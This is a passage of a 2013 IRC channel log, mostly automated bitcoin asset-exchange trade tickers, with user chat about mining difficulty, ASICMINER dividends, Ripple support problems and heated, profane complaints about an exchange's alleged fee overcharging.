BTC [+] Jun 05 13:28:17 [HAVELOCK] [ASICM] 37 @ 0.0245 = 0.9065 BTC [-] Jun 05 13:28:18 [HAVELOCK] [ASICM] 62 @ 0.02449 = 1.5184 BTC [-] Jun 05 13:28:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.024651 BTC [-] Jun 05 13:28:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.02465 BTC [-] Jun 05 13:28:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.02465 = 0.074 BTC [-] Jun 05 13:29:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.0246 = 0.246 BTC [-] Jun 05 13:30:26 [BTCTC] [ASICMINER-PT] 3 @ 2.465 = 7.395 BTC [-] Jun 05 13:30:29 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] Jun 05 13:30:32 [BTCTC] [ASICMINER-PT] 2 @ 2.456 = 4.912 BTC [-] Jun 05 13:30:37 [BTCTC] [ASICMINER-PT] 1 @ 2.4501 BTC [-] Jun 05 13:30:40 [BTCTC] [ASICMINER-PT] 2 @ 2.45 = 4.9 BTC [-] Jun 05 13:30:46 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] Jun 05 13:30:48 [BTCTC] [ASICMINER-PT] 1 @ 2.448 BTC [-] Jun 05 13:31:52 bilderberg group meeting is in a few days Jun 05 13:39:20 [BTCTC] [TAT.ASICMINER] 20 @ 0.024531 = 0.4906 BTC [-] Jun 05 13:39:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.02453 = 0.0491 BTC [-] Jun 05 13:39:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.02452 = 0.0981 BTC [-] Jun 05 13:39:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.024511 BTC [-] Jun 05 13:39:37 [BTCTC] [TAT.ASICMINER] 8 @ 0.0245 = 0.196 BTC [-] Jun 05 13:39:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.0245 BTC [-] Jun 05 13:39:48 [BTCTC] [TAT.ASICMINER] 5 @ 0.0245 = 0.1225 BTC [-] Jun 05 13:39:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.024489 BTC [-] Jun 05 13:39:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.024442 = 0.1222 BTC [-] Jun 05 13:39:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.024412 = 0.2441 BTC [-] Jun 05 13:40:05 [BTCTC] [TAT.ASICMINER] 75 @ 0.024411 = 1.8308 BTC [-] Jun 05 13:40:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.0244 = 0.0976 BTC [-] Jun 05 13:41:47 [BTCTC] [S.DICE-PT] 9 @ 0.002562 = 0.0231 BTC [+] Jun 05 13:42:07 [BTCTC] [S.DICE-PT] 200 @ 0.002574 = 0.5148 BTC [+] Jun 05 13:43:20 [BTCTC] [ASICMINER-PT] 1 @ 2.447001 BTC [-] Jun 05 13:43:22 [BTCTC] [ASICMINER-PT] 2 @ 2.447 = 4.894 BTC [-] Jun 05 13:43:24 [BTCTC] [ASICMINER-PT] 1 @ 2.445 BTC [-] Jun 05 13:43:27 [BTCTC] [ASICMINER-PT] 1 @ 2.4432 BTC [-] Jun 05 13:43:29 [BTCTC] [ASICMINER-PT] 1 @ 2.4431 BTC [-] Jun 05 13:43:31 [BTCTC] [ASICMINER-PT] 12 @ 2.4431 = 29.3172 BTC [-] Jun 05 13:43:35 [BTCTC] [ASICMINER-PT] 9 @ 2.441 = 21.969 BTC [-] Jun 05 13:44:21 [HAVELOCK] [ASICM] 1 @ 0.0247 BTC [+] Jun 05 13:51:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.024847 BTC [+] Jun 05 13:55:17 [BTCTC] [COGNITIVE] 1 @ 0.299986 BTC [-] Jun 05 13:58:42 [MPEX] [S.MPOE] 10300 @ 0.0007495 = 7.7199 BTC [-] Jun 05 14:09:38 [HAVELOCK] [ASICM] 4 @ 0.0247 = 0.0988 BTC [+] Jun 05 14:24:44 [MPEX] [S.MPOE] 16787 @ 0.00073995 = 12.4215 BTC [-] Jun 05 14:26:30 [MPEX] [S.MPOE] 613 @ 0.00073871 = 0.4528 BTC [-] Jun 05 14:28:03 [BTCTC] [ASICMINER-PT] 1 @ 2.479499 BTC [+] Jun 05 14:28:54 [BTCTC] [ASICMINER-PT] 2 @ 2.4795 = 4.959 BTC [+] Jun 05 14:29:51 [BTCTC] [ASICMINER-PT] 1 @ 2.4797 BTC [+] Jun 05 14:31:21 [BTCTC] [ASICMINER-PT] 1 @ 2.4797 BTC [+] Jun 05 14:40:40 ;;bc,stats Jun 05 14:40:41 Current Blocks: 239886 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 17 blocks | Next Difficulty In About: 1 hour, 52 minutes, and 48 seconds | Next Difficulty Estimate: 15639150.6964 | Estimated Percent Change: 28.68116 Jun 05 14:42:30 [BTCTC] [BTC-BOND] 33 @ 0.009999 = 0.33 BTC [+] Jun 05 14:42:32 [BTCTC] [BTC-BOND] 7 @ 0.009999 = 0.07 BTC [+] Jun 05 14:43:58 more plz Jun 05 14:44:23 ;;estimate Jun 05 14:44:24 Next difficulty estimate | 15639150.6964 based on data since last change | 18342597.8578 based on data for last three days Jun 05 14:49:53 28%, ouch! :P Jun 05 14:54:13 fuck you bfl :) Jun 05 14:58:10 [HAVELOCK] [ASICM] 39 @ 0.0245 = 0.9555 BTC [-] Jun 05 15:02:32 http://www.nytimes.com/2013/06/05/business/president-moves-to-curb-patent-suits.html?_r=1& Jun 05 15:02:41 ;;bc,stats Jun 05 15:02:43 Current Blocks: 239887 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 16 blocks | Next Difficulty In About: 1 hour, 46 minutes, and 10 seconds | Next Difficulty Estimate: 15617602.7409 | Estimated Percent Change: 28.50386 Jun 05 15:04:50 ThickAsThieves: "Microsoft expressed wariness about some of the president’s plans." hahaha Jun 05 15:08:06 [BTCTC] [BITVPS] 100 @ 0.000648 = 0.0648 BTC [-] Jun 05 15:08:08 hehe **** BEGIN LOGGING AT Wed Jun 5 19:41:39 2013 Jun 05 19:41:53 ;;ticker Jun 05 19:44:28 [BTCTC] [ASICMINER-PT] 1 @ 2.5029 BTC [-] Jun 05 19:47:48 [HAVELOCK] [ASICM] 370 @ 0.02537 = 9.3869 BTC [+] Jun 05 19:52:12 [BTCTC] [BITVPS] 124 @ 0.000645 = 0.08 BTC [+] Jun 05 19:52:17 [BTCTC] [BITVPS] 297 @ 0.000646 = 0.1919 BTC [+] Jun 05 19:53:40 [HAVELOCK] [ASICM] 38 @ 0.02507 = 0.9527 BTC [-] Jun 05 20:00:20 [HAVELOCK] [ASICM] 1 @ 0.02537 BTC [+] Jun 05 20:00:22 ;;bc,estimate Jun 05 20:01:50 gribble is on vacationatm Jun 05 20:02:02 [HAVELOCK] [ASICM] 4 @ 0.02537 = 0.1015 BTC [+] Jun 05 20:06:06 [BTCTC] [PAJKA.BOND] 1 @ 0.10897 BTC [+] Jun 05 20:06:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.025086 = 0.2007 BTC [-] Jun 05 20:07:16 [BTCTC] [BITVPS] 240 @ 0.000646 = 0.155 BTC [+] Jun 05 20:07:50 [BTCTC] [BITVPS] 6 @ 0.000646 = 0.0039 BTC [+] Jun 05 20:07:52 [BTCTC] [TAT.ASICMINER] 19 @ 0.025086 = 0.4766 BTC [-] Jun 05 20:08:13 [BTCTC] [TAT.ASICMINER] 21 @ 0.025087 = 0.5268 BTC [+] Jun 05 20:08:42 [HAVELOCK] [ASICM] 10 @ 0.02507 = 0.2507 BTC [-] Jun 05 20:11:12 [HAVELOCK] [ASICM] 6 @ 0.02525 = 0.1515 BTC [+] Jun 05 20:11:13 [HAVELOCK] [ASICM] 270 @ 0.02539 = 6.8553 BTC [+] Jun 05 20:11:54 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] Jun 05 20:11:56 [BTCTC] [ASICMINER-PT] 1 @ 2.4998 BTC [+] Jun 05 20:11:57 [BTCTC] [ASICMINER-PT] 1 @ 2.4999 BTC [+] Jun 05 20:11:59 [BTCTC] [ASICMINER-PT] 9 @ 2.5 = 22.5 BTC [+] Jun 05 20:12:01 [HAVELOCK] [ASICM] 26 @ 0.02539 = 0.6601 BTC [+] Jun 05 20:12:56 [BTCTC] [ASICMINER-PT] 10 @ 2.5 = 25 BTC [+] Jun 05 20:15:16 [BTCTC] [ASICMINER-PT] 17 @ 2.5 = 42.5 BTC [+] Jun 05 20:15:26 https://bitcointalk.org/index.php?topic=226196.new#new Jun 05 20:17:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.025086 = 0.0753 BTC [-] Jun 05 20:36:22 [HAVELOCK] [ASICM] 63 @ 0.0252 = 1.5876 BTC [-] Jun 05 20:39:28 ;;bc, stats Jun 05 20:39:48 15605632.68129 | Next Diff in 1991 blocks | Estimated Change: 27.4318% in 10d 0h 41m 5s Jun 05 20:43:57 [BTCTC] [COGNITIVE] 1 @ 0.298999 BTC [+] Jun 05 20:43:59 [BTCTC] [COGNITIVE] 4 @ 0.299975 = 1.1999 BTC [+] Jun 05 20:44:01 [BTCTC] [COGNITIVE] 37 @ 0.3 = 11.1 BTC [+] Jun 05 20:47:06 [BTCTC] [TAT.ASICMINER] 28 @ 0.025086 = 0.7024 BTC [-] Jun 05 20:49:22 [BTCTC] [TAT.ASICMINER] 7 @ 0.0251 = 0.1757 BTC [+] Jun 05 20:49:25 Ukto https://bitcointalk.org/index.php?topic=205814.0 Jun 05 20:50:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.0251 = 0.1255 BTC [+] Jun 05 20:51:00 [BTCTC] [TAT.ASICMINER] 81 @ 0.0251 = 2.0331 BTC [+] Jun 05 20:51:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.02516 = 0.2516 BTC [+] Jun 05 20:52:01 [BTCTC] [S.MPOE-PT] 34 @ 0.000708 = 0.0241 BTC [+] Jun 05 20:52:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.02517 = 0.1259 BTC [+] Jun 05 20:54:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.02512 = 0.1005 BTC [-] Jun 05 20:55:41 [BTCTC] [TAT.ASICMINER] 26 @ 0.02512 = 0.6531 BTC [-] Jun 05 20:59:20 [BTCTC] [TAT.ASICMINER] 40 @ 0.02512 = 1.0048 BTC [-] Jun 05 21:00:22 [BTCTC] [BASIC-MINING] 5 @ 0.699 = 3.495 BTC [+] Jun 05 21:00:47 [BTCTC] [BASIC-MINING] 10 @ 0.699999 = 7 BTC [+] Jun 05 21:00:48 [BTCTC] [TAT.ASICMINER] 57 @ 0.0251 = 1.4307 BTC [-] Jun 05 21:01:05 [BTCTC] [BASIC-MINING] 1 @ 0.7 BTC [+] Jun 05 21:01:37 [BTCTC] [ASICMINER-PT] 1 @ 2.4995 BTC [-] Jun 05 21:01:40 [BTCTC] [ASICMINER-PT] 4 @ 2.4995 = 9.998 BTC [-] Jun 05 21:01:49 [BTCTC] [MININGCO.ETF] 2 @ 0.7676 = 1.5352 BTC [+] Jun 05 21:02:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.0251 = 0.1004 BTC [-] Jun 05 21:03:52 [BTCTC] [ASICMINER-PT] 1 @ 2.4999 BTC [+] Jun 05 21:03:57 [MPEX] [S.MPOE] 3950 @ 0.000741 = 2.927 BTC [-] Jun 05 21:05:19 [HAVELOCK] [ASICM] 26 @ 0.02509 = 0.6523 BTC [-] Jun 05 21:06:16 [HAVELOCK] [ASICM] 500 @ 0.0251 = 12.55 BTC [+] Jun 05 21:07:11 [HAVELOCK] [ASICM] 496 @ 0.0251 = 12.4496 BTC [+] Jun 05 21:10:25 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [-] Jun 05 21:14:41 [HAVELOCK] [ASICM] 250 @ 0.02512 = 6.28 BTC [+] Jun 05 21:16:54 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [-] Jun 05 21:18:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.025087 BTC [-] Jun 05 21:20:24 A group of 4 ASICMINER shareholders, including myself, will be organizing and prioritizing a list of official questions to ask Friedcat on a scheduled basis. Please pm me here, or on the forums if you have a mature and reasonable question you'd like us to consider submitting. Jun 05 21:20:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.024764 = 0.0743 BTC [-] Jun 05 21:20:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.024759 BTC [-] Jun 05 21:21:11 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Jun 05 21:21:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.025086 BTC [+] Jun 05 21:22:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.025087 = 0.2509 BTC [+] Jun 05 21:23:25 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Jun 05 21:24:07 [HAVELOCK] [ASICM] 9 @ 0.0252 = 0.2268 BTC [+] Jun 05 21:25:05 [HAVELOCK] [ASICM] 40 @ 0.024601 = 0.984 BTC [-] Jun 05 21:25:30 [HAVELOCK] [ASICM] 328 @ 0.0252 = 8.2656 BTC [+] Jun 05 21:25:31 [HAVELOCK] [ASICM] 10 @ 0.0252 = 0.252 BTC [+] Jun 05 21:29:57 [BTCTC] [COGNITIVE] 1 @ 0.319999 BTC [+] Jun 05 21:30:27 [HAVELOCK] [ASICM] 52 @ 0.0252 = 1.3104 BTC [+] Jun 05 21:31:32 [BTCTC] [COGNITIVE] 1 @ 0.32 BTC [+] Jun 05 21:31:33 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Jun 05 21:31:36 [BTCTC] [COGNITIVE] 1 @ 0.32 BTC [+] Jun 05 21:32:33 [BTCTC] [TAT.ASICMINER] 72 @ 0.025087 = 1.8063 BTC [+] Jun 05 21:33:03 [BTCTC] [ASICMINER-PT] 16 @ 2.5 = 40 BTC [+] Jun 05 21:33:43 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] Jun 05 21:36:04 [BTCTC] [TAT.ASICMINER] 7 @ 0.025087 = 0.1756 BTC [+] Jun 05 21:36:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.025087 = 0.0753 BTC [+] Jun 05 21:42:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.024 = 0.072 BTC [-] Jun 05 21:46:46 [BTCTC] [ASICMINER-PT] 39 @ 2.5 = 97.5 BTC [+] Jun 05 21:50:11 kakobrekla: you there ? Jun 05 21:51:27 yes, ill ping you with div spec today Jun 05 21:55:01 div spec for what? Jun 05 21:58:24 kakobrekla: cool thx Jun 05 21:58:34 2 minutes until havelock div for asicminer goes out Jun 05 21:58:38 so i guess it wont get in there before then Jun 05 21:58:42 no rush until next wednesday Jun 05 21:59:03 how much is the div? Jun 05 22:00:09 [HAVELOCK] [ASICM] 100 @ 0.0248 = 2.48 BTC [-] Jun 05 22:00:54 [HAVELOCK] [ASICM] 1 @ 0.02538999 BTC [+] Jun 05 22:01:35 mircea_popescu: thanks. https://bitcointalk.org/index.php?topic=205814.msg2381921#msg2381921 Jun 05 22:01:36 :) Jun 05 22:01:50 [HAVELOCK] [ASICM] 85 @ 0.0247 = 2.0995 BTC [-] Jun 05 22:01:53 [HAVELOCK] [ASICM] 760 @ 0.024601 = 18.6968 BTC [-] Jun 05 22:02:31 about 0.04 I guess Jun 05 22:03:10 [HAVELOCK] [ASICM] 5 @ 0.02515 = 0.1258 BTC [+] Jun 05 22:03:12 [HAVELOCK] [ASICM] 1 @ 0.02538999 BTC [+] Jun 05 22:03:44 [BTCTC] [TAT.ASICMINER] 20 @ 0.02507 = 0.5014 BTC [+] Jun 05 22:03:51 [HAVELOCK] [ASICM] 3 @ 0.02539 = 0.0762 BTC [+] Jun 05 22:04:30 > I apologize that the ticket has had poor response times. Currently WeExchange is backlogged with hundreds of tickets regarding failures with the ripple system. Jun 05 22:04:31 lol Jun 05 22:04:31 [BTCTC] [PAJKA.BOND] 1 @ 0.1089 BTC [-] Jun 05 22:04:57 [HAVELOCK] [ASICM] 10 @ 0.025394 = 0.2539 BTC [+] Jun 05 22:05:43 [HAVELOCK] [ASICM] 7 @ 0.025394 = 0.1778 BTC [+] Jun 05 22:05:55 [HAVELOCK] [ASICM] 5 @ 0.02538999 = 0.1269 BTC [-] Jun 05 22:08:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.025065 = 0.1003 BTC [-] Jun 05 22:09:41 [BTCTC] [ASICMINER-PT] 4 @ 2.5 = 10 BTC [+] Jun 05 22:10:53 [HAVELOCK] [ASICM] 199 @ 0.0253 = 5.0347 BTC [-] Jun 05 22:11:03 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Jun 05 22:11:42 [HAVELOCK] [ASICM] 1 @ 0.0252999 BTC [-] Jun 05 22:11:48 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Jun 05 22:12:31 [HAVELOCK] [ASICM] 17 @ 0.02529989 = 0.4301 BTC [-] Jun 05 22:12:33 [HAVELOCK] [ASICM] 1 @ 0.02529989 BTC [-] Jun 05 22:12:34 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Jun 05 22:12:52 [BTCTC] [TAT.ASICMINER] 7 @ 0.02505 = 0.1754 BTC [-] Jun 05 22:13:04 [HAVELOCK] [ASICM] 1 @ 0.02525 BTC [-] Jun 05 22:13:21 Ukto, you're experiencing the ripple effect. Hope it clears up soon! Jun 05 22:13:34 [BTCTC] [TAT.ASICMINER] 8 @ 0.024 = 0.192 BTC [-] Jun 05 22:13:49 deadweasel: sigh. ripple has hurt weex's reputation badly. Jun 05 22:14:03 they have not lived up to their promises Jun 05 22:14:08 have become highly illegal Jun 05 22:14:15 [BTCTC] [ASICMINER-PT] 6 @ 2.5 = 15 BTC [+] Jun 05 22:14:15 [BTCTC] [TAT.ASICMINER] 8 @ 0.02505 = 0.2004 BTC [+] Jun 05 22:14:18 ripple is a fuckin scam Jun 05 22:14:19 and their software support is horrid Jun 05 22:14:29 and you still deal with them Jun 05 22:14:32 :\ Jun 05 22:14:33 kakobrekla: They way they are treating it, i do feel that way Jun 05 22:14:36 kakobrekla: no, i am shutting it down Jun 05 22:14:41 at least that. Jun 05 22:14:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.02506 = 0.0501 BTC [+] Jun 05 22:14:51 half the time their software doesnt work Jun 05 22:14:52 gaystamp tards didnt come that far yet Jun 05 22:14:54 unable to locate transactions Jun 05 22:14:55 etc Jun 05 22:15:03 Nejc likes Arthur too much Jun 05 22:15:03 yes it sucks bad Jun 05 22:15:10 Nejc is a retard Jun 05 22:15:12 and a scammer Jun 05 22:15:17 Nejc? Jun 05 22:15:19 yes Jun 05 22:15:24 did i miss some threads? Jun 05 22:15:34 I try to focus on my own shit, since i dont have enough time for it. lol Jun 05 22:15:36 they have been fee-scamming for over a year Jun 05 22:15:42 how so? Jun 05 22:15:45 i told them, he said yea will fix Jun 05 22:15:52 0,o Jun 05 22:15:55 ofc it ait fixed cause it brings them more $ Jun 05 22:16:05 what are they doing? Jun 05 22:16:21 [HAVELOCK] [ASICM] 6 @ 0.02524 = 0.1514 BTC [-] Jun 05 22:16:32 [BTCTC] [TAT.ASICMINER] 28 @ 0.02506 = 0.7017 BTC [+] Jun 05 22:16:34 https://bitcointalk.org/index.php?topic=225405.msg2378578#msg2378578 Jun 05 22:17:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.025051 BTC [-] Jun 05 22:17:27 [HAVELOCK] [ASICM] 1 @ 0.0252399 BTC [-] Jun 05 22:17:34 also just added a reply Jun 05 22:18:40 [BTCTC] [COGNITIVE] 1 @ 0.290002 BTC [-] Jun 05 22:18:43 [BTCTC] [TAT.ASICMINER] 39 @ 0.025051 = 0.977 BTC [-] Jun 05 22:18:49 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [-] Jun 05 22:19:02 [HAVELOCK] [ASICM] 500 @ 0.02521 = 12.605 BTC [+] Jun 05 22:19:03 [HAVELOCK] [ASICM] 20 @ 0.02523 = 0.5046 BTC [+] Jun 05 22:19:05 [HAVELOCK] [ASICM] 783 @ 0.02529989 = 19.8098 BTC [+] Jun 05 22:19:06 [HAVELOCK] [ASICM] 85 @ 0.0253 = 2.1505 BTC [+] Jun 05 22:19:08 [BTCTC] [TAT.ASICMINER] 21 @ 0.025051 = 0.5261 BTC [-] Jun 05 22:19:17 [HAVELOCK] [ASICM] 20 @ 0.0253 = 0.506 BTC [+] Jun 05 22:19:29 [BTCTC] [TAT.ASICMINER] 8 @ 0.024 = 0.192 BTC [-] Jun 05 22:19:35 [HAVELOCK] [ASICM] 342 @ 0.0253 = 8.6526 BTC [+] Jun 05 22:19:42 wow Jun 05 22:19:44 thats fucked Jun 05 22:19:53 [BTCTC] [COGNITIVE] 1 @ 0.290001 BTC [-] Jun 05 22:19:55 [HAVELOCK] [ASICM] 3 @ 0.0253 = 0.0759 BTC [+] Jun 05 22:19:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.024805 = 0.124 BTC [+] Jun 05 22:20:03 Ukto and i have been teling them for over a year Jun 05 22:20:10 but no that shitfuckface nejc Jun 05 22:20:15 [BTCTC] [TAT.ASICMINER] 11 @ 0.025051 = 0.2756 BTC [+] Jun 05 22:20:22 he will fix css first. Jun 05 22:20:32 [BTCTC] [COGNITIVE] 1 @ 0.2751 BTC [-] Jun 05 22:20:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.0246 = 0.0738 BTC [-] Jun 05 22:20:52 he is a scammer by definition Jun 05 22:21:03 yeah.. you cant tell ppl one fee rate, and charge another Jun 05 22:21:05 thats utter crap Jun 05 22:21:09 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] Jun 05 22:21:12 [BTCTC] [TAT.ASICMINER] 6 @ 0.0246 = 0.1476 BTC [-] Jun 05 22:21:18 [BTCTC] [TAT.ASICMINER] 7 @ 0.025051 = 0.1754 BTC [+] Jun 05 22:21:20 [BTCTC] [TAT.ASICMINER] 11 @ 0.025051 = 0.2756 BTC [+] Jun 05 22:21:27 i had cases where the trade was worth less than 0.01 usd Jun 05 22:21:34 and they charged me 0.01 for it Jun 05 22:21:37 0,o Jun 05 22:21:38 so i was making a - Jun 05 22:21:41 taking the deal Jun 05 22:21:41 yes Jun 05 22:21:45 and you couldnt have known Jun 05 22:21:46 yeah, fuck that Jun 05 22:21:50 because they were grouping orders Jun 05 22:22:10 so then he added a special api call after my intervention Jun 05 22:22:19 but that does not fix anything Jun 05 22:22:24 just exposes how fuckin retarded he is Jun 05 22:22:36 [BTCTC] [TAT.ASICMINER] 8 @ 0.02505 = 0.2004 BTC [-] Jun 05 22:22:45 [BTCTC] [TAT.ASICMINER] 15 @ 0.02506 = 0.3759 BTC [+] Jun 05 22:22:58 [HAVELOCK] [ASICM] 3 @ 0.0252 = 0.0756 BTC [-] Jun 05 22:23:17 [HAVELOCK] [ASICM] 6 @ 0.02525 = 0.1515 BTC [+] Jun 05 22:24:23 [BTCTC] [TAT.ASICMINER] 8 @ 0.024 = 0.192 BTC [-] Jun 05 22:24:25 [BTCTC] [TAT.ASICMINER] 20 @ 0.024553 = 0.4911 BTC [+] Jun 05 22:25:44 [BTCTC] [TAT.ASICMINER] 21 @ 0.024552 = 0.5156 BTC [-] Jun 05 22:26:22 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Jun 05 22:27:19 [HAVELOCK] [ASICM] 1 @ 0.02525 BTC [+] Jun 05 22:29:27 [HAVELOCK] [ASICM] 1 @ 0.02525 BTC [+] Jun 05 22:29:35 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Jun 05 22:30:51 [HAVELOCK] [ASICM] 3 @ 0.02525 = 0.0758 BTC [+] Jun 05 22:32:14 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] Jun 05 22:34:22 [BTCTC] [TAT.ASICMINER] 20 @ 0.02505 = 0.501 BTC [+] Jun 05 22:34:24 [BTCTC] [TAT.ASICMINER] 8 @ 0.025051 = 0.2004 BTC [+] Jun 05 22:34:26 [BTCTC] [TAT.ASICMINER] 35 @ 0.025051 = 0.8768 BTC [+] Jun 05 22:36:17 [BTCTC] [TAT.ASICMINER] 29 @ 0.025051 = 0.7265 BTC [+] Jun 05 22:36:26 [HAVELOCK] [ASICM] 3 @ 0.02525 = 0.0758 BTC [+] Jun 05 22:37:06 [HAVELOCK] [ASICM] 6 @ 0.02525 = 0.1515 BTC [+] Jun 05 22:37:07 [HAVELOCK] [ASICM] 29 @ 0.02525 = 0.7323 BTC [+] Jun 05 22:37:26 [BTCTC] [TAT.ASICMINER] 11 @ 0.025051 = 0.2756 BTC [+] Jun 05 22:37:42 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] Jun 05 22:39:32 [BTCTC] [ASICMINER-PT] 2 @ 2.503 = 5.006 BTC [+] Jun 05 22:39:51 [HAVELOCK] [ASICM] 3 @ 0.02524 = 0.0757 BTC [-] Jun 05 22:40:40 [BTCTC] [TAT.ASICMINER] 8 @ 0.024 = 0.192 BTC [-] Jun 05 22:43:06 who said i fail at not being nice https://bitcointalk.org/index.php?topic=225405.msg2382046#msg2382046 Jun 05 22:43:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.02505 = 0.1002 BTC [+] Jun 05 22:43:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.02505 = 0.1002 BTC [+] Jun 05 22:43:56 [HAVELOCK] [ASICM] 9 @ 0.02524 = 0.2272 BTC [-] Jun 05 22:46:06 [BTCTC] [TAT.ASICMINER] 9 @ 0.024 = 0.216 BTC [-] Jun 05 22:46:41 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Jun 05 22:46:48 [BTCTC] [TAT.ASICMINER] 4 @ 0.02505 = 0.1002 BTC [+] Jun 05 22:46:55 [HAVELOCK] [ASICM] 8 @ 0.02524 = 0.2019 BTC [-] Jun 05 22:46:56 [HAVELOCK] [ASICM] 82 @ 0.02525 = 2.0705 BTC [+] Jun 05 22:46:58 [HAVELOCK] [ASICM] 150 @ 0.02529 = 3.7935 BTC [+] Jun 05 22:46:59 [HAVELOCK] [ASICM] 183 @ 0.0253 = 4.6299 BTC [+] Jun 05 22:47:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.02505 = 0.1253 BTC [+] Jun 05 22:47:33 [BTCTC] [TAT.ASICMINER] 11 @ 0.025051 = 0.2756 BTC [+] Jun 05 22:49:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.025051 = 0.0501 BTC [+] Jun 05 22:50:19 [BTCTC] [TAT.ASICMINER] 16 @ 0.025051 = 0.4008 BTC [+] Jun 05 22:50:20 [BTCTC] [BTC-GOLD] 4 @ 0.005305 = 0.0212 BTC [-] Jun 05 22:50:49 [BTCTC] [ASICMINER-PT] 6 @ 2.5 = 15 BTC [-] Jun 05 22:51:25 [HAVELOCK] [ASICM] 12 @ 0.02525 = 0.303 BTC [-] Jun 05 22:51:30 [BTCTC] [ASICMINER-PT] 2 @ 2.505 = 5.01 BTC [+] Jun 05 22:52:25 kakobrekla: since you obviosly aren't normal user, stfu :D Jun 05 22:52:43 apparently i aint normal anything. Jun 05 22:53:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.024 = 0.096 BTC [-] Jun 05 22:53:20 [BTCTC] [TAT.ASICMINER] 135 @ 0.02505 = 3.3818 BTC [+] Jun 05 22:53:28 seems small ammts of scamming are allowed in the community Jun 05 22:53:40 new task: figure out how much scamming can pass Jun 05 22:53:56 apparently inaba idiot has some problems so thats the uppper limit Jun 05 22:54:09 and gaystamp... nobody notices that so thats the bottom limit Jun 05 22:54:24 there is a perfect scam amount in between Jun 05 22:54:31 [HAVELOCK] [ASICM] 10 @ 0.02525 = 0.2525 BTC [-] Jun 05 22:55:03 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] Jun 05 22:55:04 [HAVELOCK] [ASICM] 7 @ 0.02491 = 0.1744 BTC [-] Jun 05 22:55:06 [HAVELOCK] [ASICM] 9 @ 0.0249 = 0.2241 BTC [-] Jun 05 22:55:07 [BTCTC] [TAT.ASICMINER] 5 @ 0.024 = 0.12 BTC [-] Jun 05 22:55:08 [BTCTC] [BASIC-MINING] 6 @ 0.7 = 4.2 BTC [+] Jun 05 22:55:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.024602 BTC [+] Jun 05 22:55:58 [BTCTC] [ASICMINER-PT] 4 @ 2.505 = 10.02 BTC [+] Jun 05 22:56:48 mircea_popescu can we do S.SCAM pls? Jun 05 22:57:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.02504 BTC [+] Jun 05 22:57:43 TAT.SCAM coming right after! Jun 05 22:58:19 [BTCTC] [TAT.ASICMINER] 3 @ 0.02504 = 0.0751 BTC [+] Jun 05 22:58:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.02504 BTC [+] Jun 05 22:58:54 you mean SCAM-PT, no? Jun 05 22:59:09 no, cuz i dont allow import/export Jun 05 22:59:13 :) Jun 05 22:59:33 ahh. and i'm doing scam futures. Jun 05 23:00:19 [HAVELOCK] [ASICM] 32 @ 0.02525 = 0.808 BTC [+] Jun 05 23:00:19 both for even and odd months ;D Jun 05 23:00:25 i'd buy some if there were a way to actually do scam futures Jun 05 23:00:28 and drama futures Jun 05 23:00:51 bitcoin never disappoints in those fundamentals Jun 05 23:00:59 [BTCTC] [TAT.ASICMINER] 43 @ 0.024 = 1.032 BTC [-] Jun 05 23:03:07 real amount of options for sale on btct Jun 05 